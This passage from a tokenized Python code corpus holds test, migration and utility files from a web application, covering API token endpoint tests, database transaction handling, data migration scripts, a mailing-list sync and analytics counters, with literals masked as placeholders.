<EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> assert_false ( res . json [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] . has_key ( '<STR_LIT>' ) ) <EOL> def test_create_with_admin_scope_fails ( self ) : <EOL> res = self . app . post_json_api ( TOKEN_LIST_URL , self . injected_scope , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def test_create_with_fake_scope_fails ( self ) : <EOL> res = self . app . post_json_api ( TOKEN_LIST_URL , self . nonsense_scope , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def test_update_with_admin_scope_fails ( self ) : <EOL> res = self . app . put_json_api ( self . user1_token_url , self . injected_scope , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def test_update_with_fake_scope_fails ( self ) : <EOL> res = self . app . put_json_api ( self . user1_token_url , self . nonsense_scope , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_token_does_not_return_token_id ( self , mock_revoke ) : <EOL> mock_revoke . return_value = True <EOL> res = self . app . put_json_api ( self . user1_token_url , self . correct , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> assert_false ( res . json [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] . has_key ( '<STR_LIT>' ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_token ( self , mock_revoke ) : <EOL> mock_revoke . return_value = True <EOL> res = self . app . put_json_api ( self . user1_token_url , self . correct , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> def test_update_token_incorrect_type ( self ) : <EOL> res = self . app . put_json_api ( self . user1_token_url , self . incorrect_type , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def test_update_token_no_type ( self ) : <EOL> res = self . app . put_json_api ( self . user1_token_url , self . missing_type , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def test_update_token_no_attributes ( self ) : <EOL> payload = { '<STR_LIT:id>' : self . user1_token . _id , '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT:name>' : '<STR_LIT>' } <EOL> res = self . app . put_json_api ( self . user1_token_url , payload , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def test_partial_update_token_incorrect_type ( self ) : <EOL> res = self . app . patch_json_api ( self . user1_token_url , self . incorrect_type , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def test_partial_update_token_no_type ( self ) : <EOL> res = self . app . patch_json_api ( self . user1_token_url , self . missing_type , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def test_partial_update_token_no_attributes ( self ) : <EOL> payload = { <EOL> '<STR_LIT:data>' : <EOL> { '<STR_LIT:id>' : self . user1_token . _id , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> res = self . app . patch_json_api ( self . user1_token_url , payload , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def tearDown ( self ) : <EOL> super ( TestTokenDetail , self ) . tearDown ( ) <EOL> ApiOAuth2PersonalToken . remove ( ) <EOL> User . remove ( ) </s>
<s> import blinker <EOL> signals = blinker . Namespace ( ) <EOL> user_registered = signals . signal ( '<STR_LIT>' ) <EOL> user_confirmed = signals . signal ( '<STR_LIT>' ) <EOL> user_email_removed = signals . signal ( '<STR_LIT>' ) <EOL> user_merged = signals . signal ( '<STR_LIT>' ) <EOL> contributor_removed = signals . signal ( '<STR_LIT>' ) <EOL> node_deleted = signals . signal ( '<STR_LIT>' ) <EOL> unconfirmed_user_created = signals . signal ( '<STR_LIT>' ) </s>
<s> import logging <EOL> import functools <EOL> from pymongo . errors import OperationFailure <EOL> from framework . mongo import database as proxy_database <EOL> from framework . transactions import commands , messages , utils <EOL> logger = logging . getLogger ( __name__ ) <EOL> class TokuTransaction ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , database = None ) : <EOL> self . database = database or proxy_database <EOL> self . pending = False <EOL> def __enter__ ( self ) : <EOL> try : <EOL> commands . begin ( self . database ) <EOL> self . pending = True <EOL> except OperationFailure as error : <EOL> message = utils . get_error_message ( error ) <EOL> if messages . TRANSACTION_EXISTS_ERROR not in message : <EOL> raise <EOL> logger . warn ( '<STR_LIT>' ) <EOL> return self <EOL> def __exit__ ( self , exc_type , exc_val , exc_tb ) : <EOL> if self . pending : <EOL> if exc_type : <EOL> commands . rollback ( self . database ) <EOL> self . pending = False <EOL> raise exc_type , exc_val , exc_tb <EOL> try : <EOL> commands . commit ( self . database ) <EOL> self . pending = False <EOL> except OperationFailure as error : <EOL> message = utils . get_error_message ( error ) <EOL> if messages . LOCK_ERROR in message : <EOL> commands . rollback ( self . database ) <EOL> self . pending = False <EOL> raise <EOL> def transaction ( database = None ) : <EOL> """<STR_LIT>""" <EOL> def wrapper ( func ) : <EOL> @ functools . wraps ( func ) <EOL> def wrapped ( * args , ** kwargs ) : <EOL> with TokuTransaction ( database ) : <EOL> return func ( * args , ** kwargs ) <EOL> return wrapped <EOL> return wrapper </s>
<s> """<STR_LIT>""" <EOL> import bson <EOL> import datetime <EOL> from cStringIO import StringIO <EOL> import pymongo <EOL> from framework . mongo import database <EOL> from website import models <EOL> from website . app import app , init_app <EOL> from scripts . analytics import utils <EOL> from scripts . analytics import settings <EOL> mapper = bson . Code ( '''<STR_LIT>''' ) <EOL> reducer = bson . Code ( '''<STR_LIT>''' ) <EOL> out = { '<STR_LIT:replace>' : settings . TABULATE_LOGS_RESULTS_COLLECTION } <EOL> def run_map_reduce ( ** kwargs ) : <EOL> return database [ '<STR_LIT>' ] . map_reduce ( <EOL> mapper , <EOL> reducer , <EOL> out , <EOL> ** kwargs <EOL> ) <EOL> def main ( ) : <EOL> node = models . Node . load ( settings . TABULATE_LOGS_NODE_ID ) <EOL> user = models . User . load ( settings . TABULATE_LOGS_USER_ID ) <EOL> cutoff = datetime . datetime . utcnow ( ) - settings . TABULATE_LOGS_TIME_OFFSET <EOL> result = run_map_reduce ( query = { '<STR_LIT:date>' : { '<STR_LIT>' : cutoff } } ) <EOL> sio = StringIO ( ) <EOL> utils . make_csv ( <EOL> sio , <EOL> ( <EOL> ( row [ '<STR_LIT>' ] , row [ '<STR_LIT:value>' ] ) <EOL> for row in result . find ( ) . sort ( [ ( '<STR_LIT:value>' , pymongo . DESCENDING ) ] ) <EOL> ) , <EOL> [ '<STR_LIT:name>' , '<STR_LIT:count>' ] , <EOL> ) <EOL> utils . send_file ( settings . TABULATE_LOGS_FILE_NAME , settings . TABULATE_LOGS_CONTENT_TYPE , sio , node , user ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> init_app ( ) <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> from bson import ObjectId <EOL> from website . app import init_app <EOL> from website import models <EOL> from framework import Q <EOL> app = init_app ( ) <EOL> def impute_log_date ( dry_run = True ) : <EOL> no_date = models . NodeLog . find ( <EOL> Q ( '<STR_LIT:date>' , '<STR_LIT>' , None ) <EOL> ) <EOL> for log in no_date : <EOL> oid = ObjectId ( log . _primary_key ) <EOL> imputed_date = oid . generation_time <EOL> print u'<STR_LIT>' . format ( <EOL> imputed_date . strftime ( '<STR_LIT>' ) , <EOL> log . _primary_key , <EOL> ) <EOL> if not dry_run : <EOL> log . _fields [ '<STR_LIT:date>' ] . __set__ ( log , imputed_date , safe = True ) <EOL> log . save ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import sys <EOL> dry_run = len ( sys . argv ) == <NUM_LIT:1> or sys . argv [ <NUM_LIT:1> ] . lower ( ) not in [ '<STR_LIT:f>' , '<STR_LIT:false>' ] <EOL> impute_log_date ( dry_run = dry_run ) </s>
<s> """<STR_LIT>""" <EOL> from framework . auth . utils import impute_names <EOL> from website . app import init_app <EOL> from website import models <EOL> app = init_app ( '<STR_LIT>' , set_backends = True , routes = True ) <EOL> def impute_names ( ) : <EOL> for user in models . User . find ( ) : <EOL> parsed = impute_names ( user . fullname ) <EOL> for field , value in parsed . items ( ) : <EOL> if getattr ( user , field , None ) is None : <EOL> setattr ( user , field , value ) <EOL> user . save ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> impute_names ( ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from modularodm import Q <EOL> from website . models import NodeLog , Node , RegistrationApproval <EOL> from website . app import init_app <EOL> from scripts import utils as script_utils <EOL> from framework . mongo import database as db <EOL> from framework . transactions . context import TokuTransaction <EOL> logger = logging . getLogger ( __name__ ) <EOL> logging . basicConfig ( level = logging . INFO ) <EOL> def get_targets ( ) : <EOL> """<STR_LIT>""" <EOL> logs = NodeLog . find ( <EOL> Q ( '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ) | <EOL> Q ( '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ) | <EOL> Q ( '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ) | <EOL> Q ( '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ) | <EOL> Q ( '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ) | <EOL> Q ( '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ) | <EOL> Q ( '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ) | <EOL> Q ( '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ) | <EOL> Q ( '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ) | <EOL> Q ( '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> return logs <EOL> def get_registered_from ( registration ) : <EOL> """<STR_LIT>""" <EOL> if registration . registered_from : <EOL> return registration . registered_from_id <EOL> else : <EOL> first_log_id = db [ '<STR_LIT>' ] . find_one ( { '<STR_LIT>' : registration . _id } ) [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> log = NodeLog . load ( first_log_id ) <EOL> return log . params . get ( '<STR_LIT>' ) or log . params . get ( '<STR_LIT>' ) <EOL> def migrate_log ( logs ) : <EOL> """<STR_LIT>""" <EOL> logs_count = logs . count ( ) <EOL> count = <NUM_LIT:0> <EOL> for log in logs : <EOL> count += <NUM_LIT:1> <EOL> node = log . params . get ( '<STR_LIT>' ) or log . params . get ( '<STR_LIT>' ) <EOL> params_node = Node . load ( node ) <EOL> if params_node . is_registration : <EOL> log . params [ '<STR_LIT>' ] = get_registered_from ( params_node ) <EOL> log . params [ '<STR_LIT>' ] = params_node . _id <EOL> else : <EOL> log . params [ '<STR_LIT>' ] = RegistrationApproval . load ( log . params [ '<STR_LIT>' ] ) . _get_registration ( ) . _id <EOL> log . save ( ) <EOL> logger . info ( '<STR_LIT>' . format ( count , <EOL> logs_count , log . _id , log . action , log . params [ '<STR_LIT>' ] , log . params [ '<STR_LIT>' ] ) ) <EOL> def main ( dry_run ) : <EOL> logs = get_targets ( ) <EOL> migrate_log ( logs ) <EOL> if not dry_run : <EOL> logger . info ( '<STR_LIT>' . format ( len ( logs ) ) ) <EOL> else : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import sys <EOL> script_utils . add_file_logger ( logger , __file__ ) <EOL> dry_run = '<STR_LIT>' in sys . argv <EOL> init_app ( set_backends = True , routes = False ) <EOL> with TokuTransaction ( ) : <EOL> main ( dry_run = dry_run ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from modularodm import Q <EOL> from framework . mongo import database <EOL> from framework . transactions . context import TokuTransaction <EOL> from website import settings <EOL> from website . models import Node <EOL> from website . app import init_app <EOL> from website . addons . osfstorage . model import OsfStorageFileRecord <EOL> from scripts import utils as script_utils <EOL> from scripts . osfstorage . utils import ensure_osf_files <EOL> logger = logging . getLogger ( __name__ ) <EOL> def migrate_version ( idx , file_data , record , dry_run = True ) : <EOL> version = record . versions [ idx ] <EOL> logger . info ( '<STR_LIT>' . format ( version . _id , file_data [ '<STR_LIT>' ] ) ) <EOL> if not dry_run : <EOL> version . _fields [ '<STR_LIT>' ] . __set__ ( version , file_data [ '<STR_LIT>' ] , safe = True ) <EOL> version . save ( ) <EOL> def migrate_node ( node , dry_run = True ) : <EOL> node_settings = node . get_addon ( '<STR_LIT>' ) <EOL> for path , versions in node . files_versions . iteritems ( ) : <EOL> for idx , version in enumerate ( versions ) : <EOL> logger . info ( '<STR_LIT>' . format ( path , idx , node . _id ) ) <EOL> try : <EOL> file_data = database [ '<STR_LIT>' ] . find_one ( { '<STR_LIT>' : version } ) <EOL> record = OsfStorageFileRecord . find_by_path ( file_data [ '<STR_LIT:path>' ] , node_settings ) <EOL> migrate_version ( idx , file_data , record , dry_run = dry_run ) <EOL> except Exception as error : <EOL> logger . error ( '<STR_LIT>' . format ( version , node . _id ) ) <EOL> logger . exception ( error ) <EOL> break <EOL> def get_nodes ( ) : <EOL> return Node . find ( Q ( '<STR_LIT>' , '<STR_LIT>' , None ) ) <EOL> def main ( dry_run = True ) : <EOL> nodes = get_nodes ( ) <EOL> logger . info ( '<STR_LIT>' . format ( len ( nodes ) ) ) <EOL> for node in nodes : <EOL> try : <EOL> with TokuTransaction ( ) : <EOL> migrate_node ( node , dry_run = dry_run ) <EOL> except Exception as error : <EOL> logger . error ( '<STR_LIT>' . format ( node . _id ) ) <EOL> logger . exception ( error ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import sys <EOL> dry_run = '<STR_LIT>' in sys . argv <EOL> if not dry_run : <EOL> script_utils . add_file_logger ( logger , __file__ ) <EOL> ensure_osf_files ( settings ) <EOL> init_app ( set_backends = True , routes = False ) <EOL> main ( dry_run = dry_run ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from modularodm import Q <EOL> from framework . auth . core import User <EOL> from website import mailchimp_utils , settings <EOL> from website . app import init_app <EOL> from tests . base import OsfTestCase <EOL> from tests . factories import UserFactory , UnconfirmedUserFactory <EOL> from nose . tools import * <EOL> import mock <EOL> import logging <EOL> from scripts import utils as script_utils <EOL> logger = logging . getLogger ( __name__ ) <EOL> GENERAL_LIST = settings . MAILCHIMP_GENERAL_LIST <EOL> def main ( dry = True ) : <EOL> init_app ( routes = False ) <EOL> users = list ( get_users ( ) ) <EOL> update_users ( users , dry = dry ) <EOL> subscribe_users ( users , dry = dry ) <EOL> def update_users ( users , dry = True ) : <EOL> for user in get_users ( ) : <EOL> if not dry : <EOL> if user . mailchimp_mailing_lists is None : <EOL> user . mailchimp_mailing_lists = { } <EOL> user . mailchimp_mailing_lists [ GENERAL_LIST ] = True <EOL> user . save ( ) <EOL> logger . info ( '<STR_LIT>' . format ( user . _id ) ) <EOL> def get_users ( ) : <EOL> """<STR_LIT>""" <EOL> return User . find ( Q ( '<STR_LIT>' , '<STR_LIT>' , True ) ) <EOL> def serialize_user ( user ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT:email>' : { '<STR_LIT:email>' : user . username } , <EOL> '<STR_LIT>' : '<STR_LIT:html>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : user . given_name , <EOL> '<STR_LIT>' : user . family_name } <EOL> } <EOL> def subscribe_users ( users , dry = True ) : <EOL> serialized = [ serialize_user ( user ) for user in users ] <EOL> m = mailchimp_utils . get_mailchimp_api ( ) <EOL> list_id = mailchimp_utils . get_list_id_from_name ( list_name = GENERAL_LIST ) <EOL> logger . info ( '<STR_LIT>' . format ( len ( users ) , GENERAL_LIST ) ) <EOL> if not dry : <EOL> subscribe_info = m . lists . batch_subscribe ( <EOL> id = list_id , <EOL> batch = serialized , <EOL> double_optin = False , <EOL> update_existing = True <EOL> ) <EOL> logger . info ( '<STR_LIT>' . format ( n = subscribe_info [ '<STR_LIT>' ] ) ) <EOL> class TestSyncEmail ( OsfTestCase ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( TestSyncEmail , cls ) . setUpClass ( ) <EOL> cls . _mailchimp_api_key = settings . MAILCHIMP_API_KEY <EOL> settings . MAILCHIMP_API_KEY = '<STR_LIT>' <EOL> @ classmethod <EOL> def tearDownClass ( cls ) : <EOL> super ( TestSyncEmail , cls ) . tearDownClass ( ) <EOL> settings . MAILCHIMP_API_KEY = cls . _mailchimp_api_key <EOL> cls . _mailchimp_api_key = None <EOL> def setUp ( self ) : <EOL> super ( TestSyncEmail , self ) . setUp ( ) <EOL> self . user = UserFactory ( ) <EOL> self . unconfirmed = UnconfirmedUserFactory ( ) <EOL> def test_update_users ( self ) : <EOL> users = get_users ( ) <EOL> assert_false ( self . user . mailchimp_mailing_lists ) <EOL> update_users ( users , dry = False ) <EOL> assert_equal ( self . user . mailchimp_mailing_lists , { '<STR_LIT>' : True } ) <EOL> def test_serialize_user ( self ) : <EOL> user = UserFactory ( ) <EOL> result = serialize_user ( user ) <EOL> assert_equal ( result , { '<STR_LIT:email>' : { '<STR_LIT:email>' : user . username } , <EOL> '<STR_LIT>' : '<STR_LIT:html>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : user . given_name , <EOL> '<STR_LIT>' : user . family_name } <EOL> } ) <EOL> def test_get_users ( self ) : <EOL> users = list ( get_users ( ) ) <EOL> assert_equal ( len ( users ) , <NUM_LIT:1> ) <EOL> assert_not_in ( self . unconfirmed , users ) <EOL> assert_equal ( users , [ self . user ] ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_subscribe_users_called_with_correct_arguments ( self , mock_subscribe , mock_list ) : <EOL> mock_list . return_value = { '<STR_LIT:data>' : [ { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT>' : GENERAL_LIST } ] } <EOL> list_id = mailchimp_utils . get_list_id_from_name ( GENERAL_LIST ) <EOL> users = list ( get_users ( ) ) <EOL> subscribe_users ( users , dry = False ) <EOL> serialized = [ serialize_user ( u ) for u in users ] <EOL> mock_subscribe . assert_called_with ( id = list_id , <EOL> batch = serialized , <EOL> double_optin = False , <EOL> update_existing = True <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_main ( self , mock_subscribe , mock_list ) : <EOL> mock_list . return_value = { '<STR_LIT:data>' : [ { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT>' : GENERAL_LIST } ] } <EOL> assert_false ( self . user . mailchimp_mailing_lists ) <EOL> main ( dry = False ) <EOL> assert_true ( self . user . mailchimp_mailing_lists [ GENERAL_LIST ] ) <EOL> mock_subscribe . assert_called ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> script_utils . add_file_logger ( logger , __file__ ) <EOL> main ( dry = '<STR_LIT>' in sys . argv ) </s>
<s> from nose . tools import * <EOL> from tests . base import OsfTestCase <EOL> import json <EOL> from modularodm import Q <EOL> from framework . mongo . utils import to_mongo <EOL> from website . project . model import ensure_schemas , MetaSchema , Node <EOL> from tests import factories <EOL> from scripts . migration . migrate_registered_meta import ( <EOL> main as do_migration , <EOL> prepare_nodes <EOL> ) <EOL> SCHEMA_NAMES = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> OLD_META = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:yes>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> class TestMigrateSchemas ( OsfTestCase ) : <EOL> def _make_registration ( self , schemas ) : <EOL> if not isinstance ( schemas , list ) : <EOL> schemas = [ schemas ] <EOL> reg = factories . RegistrationFactory ( ) <EOL> reg . save ( ) <EOL> self . db [ '<STR_LIT>' ] . update ( <EOL> { '<STR_LIT>' : reg . _id } , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> to_mongo ( schema . name ) : json . dumps ( OLD_META [ schema . name ] ) <EOL> for schema in schemas <EOL> } , <EOL> '<STR_LIT>' : None <EOL> } <EOL> } <EOL> ) <EOL> def setUp ( self ) : <EOL> super ( TestMigrateSchemas , self ) . setUp ( ) <EOL> MetaSchema . remove ( ) <EOL> ensure_schemas ( ) <EOL> self . regular_old_node = factories . NodeFactory ( ) <EOL> self . open_ended_schema = MetaSchema . find_one ( <EOL> Q ( '<STR_LIT:name>' , '<STR_LIT>' , SCHEMA_NAMES [ <NUM_LIT:0> ] ) & <EOL> Q ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> ) <EOL> self . open_ended = self . _make_registration ( self . open_ended_schema ) <EOL> self . standard_schema = MetaSchema . find_one ( <EOL> Q ( '<STR_LIT:name>' , '<STR_LIT>' , SCHEMA_NAMES [ <NUM_LIT:1> ] ) & <EOL> Q ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> ) <EOL> self . standard = self . _make_registration ( self . standard_schema ) <EOL> self . brandt_pre_schema = MetaSchema . find_one ( <EOL> Q ( '<STR_LIT:name>' , '<STR_LIT>' , SCHEMA_NAMES [ <NUM_LIT:2> ] ) & <EOL> Q ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> ) <EOL> self . brandt_pre = self . _make_registration ( self . brandt_pre_schema ) <EOL> self . brandt_post_schema = MetaSchema . find_one ( <EOL> Q ( '<STR_LIT:name>' , '<STR_LIT>' , SCHEMA_NAMES [ <NUM_LIT:3> ] ) & <EOL> Q ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> ) <EOL> self . brandt_post = self . _make_registration ( self . brandt_post_schema ) <EOL> self . multiple = self . _make_registration ( [ <EOL> self . brandt_pre_schema , <EOL> self . brandt_post_schema <EOL> ] ) <EOL> self . confirmatory_schema = MetaSchema . find_one ( <EOL> Q ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> self . confirmatory = self . _make_registration ( self . confirmatory_schema ) <EOL> self . db [ '<STR_LIT>' ] . update ( { } , { '<STR_LIT>' : { '<STR_LIT>' : None } } , multi = True ) <EOL> def tearDown ( self ) : <EOL> super ( TestMigrateSchemas , self ) . tearDown ( ) <EOL> self . db [ '<STR_LIT>' ] . remove ( ) <EOL> def test_prepare_nodes ( self ) : <EOL> prepare_nodes ( self . db ) <EOL> for node in self . db [ '<STR_LIT>' ] . find ( ) : <EOL> assert_equal ( node [ '<STR_LIT>' ] , [ ] ) <EOL> def test_migrate_registration_schemas ( self ) : <EOL> target_nodes = self . db [ '<STR_LIT>' ] . find ( { '<STR_LIT>' : True } ) <EOL> do_migration ( _db = self . db ) <EOL> for node in target_nodes : <EOL> for meta_schema_id in node [ '<STR_LIT>' ] : <EOL> meta_schema = MetaSchema . load ( meta_schema_id ) <EOL> old_data = OLD_META [ meta_schema . name ] <EOL> for key , value in old_data . iteritems ( ) : <EOL> assert_equal ( <EOL> node [ '<STR_LIT>' ] [ meta_schema . _id ] [ key ] [ '<STR_LIT:value>' ] , <EOL> value <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from nose . tools import * <EOL> from flask import Flask <EOL> from datetime import datetime <EOL> from framework import analytics , sessions <EOL> from framework . sessions import session <EOL> from tests . base import OsfTestCase <EOL> from tests . factories import UserFactory , ProjectFactory <EOL> class TestAnalytics ( OsfTestCase ) : <EOL> def test_get_total_activity_count ( self ) : <EOL> user = UserFactory ( ) <EOL> date = datetime . utcnow ( ) <EOL> assert_equal ( analytics . get_total_activity_count ( user . _id ) , <NUM_LIT:0> ) <EOL> assert_equal ( analytics . get_total_activity_count ( user . _id ) , user . get_activity_points ( db = self . db ) ) <EOL> analytics . increment_user_activity_counters ( user . _id , '<STR_LIT>' , date , db = self . db ) <EOL> assert_equal ( analytics . get_total_activity_count ( user . _id , db = self . db ) , <NUM_LIT:1> ) <EOL> assert_equal ( analytics . get_total_activity_count ( user . _id , db = self . db ) , user . get_activity_points ( db = self . db ) ) <EOL> def test_increment_user_activity_counters ( self ) : <EOL> user = UserFactory ( ) <EOL> date = datetime . utcnow ( ) <EOL> assert_equal ( user . get_activity_points ( db = self . db ) , <NUM_LIT:0> ) <EOL> analytics . increment_user_activity_counters ( user . _id , '<STR_LIT>' , date , db = self . db ) <EOL> assert_equal ( user . get_activity_points ( db = self . db ) , <NUM_LIT:1> ) <EOL> class UpdateCountersTestCase ( OsfTestCase ) : <EOL> def setUp ( self ) : <EOL> decoratorapp = Flask ( '<STR_LIT>' ) <EOL> self . ctx = decoratorapp . test_request_context ( ) <EOL> self . ctx . push ( ) <EOL> sessions . set_session ( sessions . Session ( ) ) <EOL> def tearDown ( self ) : <EOL> self . ctx . pop ( ) <EOL> class TestUpdateCounters ( UpdateCountersTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestUpdateCounters , self ) . setUp ( ) <EOL> self . node = ProjectFactory ( ) <EOL> self . fid = '<STR_LIT:foo>' <EOL> self . vid = <NUM_LIT:1> <EOL> def test_update_counters_file ( self ) : <EOL> @ analytics . update_counters ( '<STR_LIT>' , db = self . db ) <EOL> def download_file_ ( ** kwargs ) : <EOL> return kwargs . get ( '<STR_LIT>' ) or kwargs . get ( '<STR_LIT>' ) <EOL> count = analytics . get_basic_counters ( '<STR_LIT>' . format ( self . node , self . fid ) , db = self . db ) <EOL> assert_equal ( count , ( None , None ) ) <EOL> download_file_ ( node = self . node , fid = self . fid ) <EOL> count = analytics . get_basic_counters ( '<STR_LIT>' . format ( self . node , self . fid ) , db = self . db ) <EOL> assert_equal ( count , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> page = '<STR_LIT>' . format ( self . node , self . fid ) <EOL> session . data [ '<STR_LIT>' ] . append ( page ) <EOL> download_file_ ( node = self . node , fid = self . fid ) <EOL> count = analytics . get_basic_counters ( '<STR_LIT>' . format ( self . node , self . fid ) , db = self . db ) <EOL> assert_equal ( count , ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> def test_update_counters_file_version ( self ) : <EOL> @ analytics . update_counters ( '<STR_LIT>' , db = self . db ) <EOL> def download_file_version_ ( ** kwargs ) : <EOL> return kwargs . get ( '<STR_LIT>' ) or kwargs . get ( '<STR_LIT>' ) <EOL> count = analytics . get_basic_counters ( '<STR_LIT>' . format ( self . node , self . fid , self . vid ) , db = self . db ) <EOL> assert_equal ( count , ( None , None ) ) <EOL> download_file_version_ ( node = self . node , fid = self . fid , vid = self . vid ) <EOL> count = analytics . get_basic_counters ( '<STR_LIT>' . format ( self . node , self . fid , self . vid ) , db = self . db ) <EOL> assert_equal ( count , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> page = 